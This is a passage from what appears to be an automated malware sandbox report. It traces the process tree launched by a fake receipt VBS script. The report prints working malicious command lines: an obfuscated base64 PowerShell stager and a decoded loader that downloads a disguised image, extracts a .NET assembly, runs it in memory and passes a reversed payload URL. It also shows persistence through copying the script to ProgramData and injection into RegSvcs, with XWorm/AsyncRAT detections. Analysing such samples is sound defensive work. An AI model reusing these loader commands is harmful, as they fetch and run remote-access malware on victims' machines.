Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\I7336446-receipt.vbs"
Imagebase:	0x7ff6e4200000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	09:48:22
Start date:	04/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreeQBhDgTreG0DgTrebwB3DgTreHgDgTreLwBtDgTreG4DgTreLwBtDgTreG8DgTreYwDgTreuDgTreDcDgTreMgBlDgTreHYDgTrebDgTreBvDgTreHYDgTreZQDgTreuDgTreHcDgTredwB3DgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreG0DgTrebwBxDgTreHUDgTreZQBuDgTreHEDgTredQBlDgTreGkDgTrecgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreFMDgTredgBjDgTreHMDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	09:48:22
Start date:	04/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	09:48:35
Start date:	04/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	9
Start time:	09:48:45
Start date:	04/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\moquenqueiro.vbs"
Imagebase:	0x7ff62a190000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	09:48:45
Start date:	04/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	11
Start time:	09:48:47
Start date:	04/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x790000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.3360198407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.3360198407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Target ID:	14
Start time:	09:48:57
Start date:	04/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\moquenqueiro.vbs"
Imagebase:	0x7ff6e4200000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true